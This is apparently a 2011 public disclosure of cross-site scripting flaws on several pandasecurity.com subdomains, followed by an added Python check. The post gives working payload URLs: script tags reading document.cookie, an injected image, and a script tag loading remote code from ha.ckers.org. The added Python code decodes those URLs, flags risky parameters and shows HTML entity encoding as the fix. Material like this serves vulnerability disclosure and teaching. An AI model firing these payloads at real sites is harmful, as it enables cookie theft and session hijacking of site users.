# Exploit Title: Cross Site Scripting Pandasecurity.com
# Date: 26.09.2011
# Author: Sony
# Blog : http://st2tea.blogspot.com
..................................................................
Interesting XSS.
http://apac.pandasecurity.com/autovin/wp-admin/admin.php?page=sitepress-multilingual-cms/menu/languages.php icl_ajx_action=get_translator_status&cache=1
After Registration:
First Name : < script >alert(document.cookie)< / script >
Last Name: < script >alert(document.cookie)< / script >
https://mep.pandasecurity.com/admin/index.php?action=showRememberPassword&userKind=[html code injection]
Demo:
https://mep.pandasecurity.com/admin/index.php?action=showRememberPassword&userKind=%22%22%3E%3Cimg%20src=http://www.chinatoday.com/entertain/china.funny.pictures/kung.fu.panda02.jpg%3E
http://matchingseats.us.pandasecurity.com/?company=%22%22%3C/SCRIPT%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E
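
An added example, not part of the original post: a defender-side check that decodes the two demo URLs above, flags query parameters carrying markup characters, and shows the same value after HTML entity encoding. The `<input>` template and all function names are assumptions, since the post does not show the server-side code.

```python
import html
from urllib.parse import urlsplit, parse_qsl

# Request URLs copied from the demo lines of the post.
DEMO_URLS = [
    "https://mep.pandasecurity.com/admin/index.php?action=showRememberPassword"
    "&userKind=%22%22%3E%3Cimg%20src=http://www.chinatoday.com/entertain/"
    "china.funny.pictures/kung.fu.panda02.jpg%3E",
    "http://matchingseats.us.pandasecurity.com/?company=%22%22%3C/SCRIPT%3E"
    "%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E",
]

# Characters that let a reflected value leave an attribute or text context.
MARKUP_CHARS = set("<>\"'")


def suspicious_params(url):
    """Return {name: decoded_value} for query parameters carrying markup characters."""
    found = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if MARKUP_CHARS & set(value):
            found[name] = value
    return found


def render_vulnerable(value):
    # Hypothetical template (assumption): raw reflection into a quoted attribute.
    return '<input type="hidden" name="userKind" value="%s">' % value


def render_encoded(value):
    # Same template with entity encoding; quote=True also encodes " and '.
    return '<input type="hidden" name="userKind" value="%s">' % html.escape(value, quote=True)


if __name__ == "__main__":
    for url in DEMO_URLS:
        for name, value in suspicious_params(url).items():
            print(name, "->", repr(value))
            print("  raw:    ", render_vulnerable(value))
            print("  encoded:", render_encoded(value))
```

In the raw rendering the decoded value closes the attribute and adds a second tag; in the encoded rendering it stays inside the `value` attribute as text.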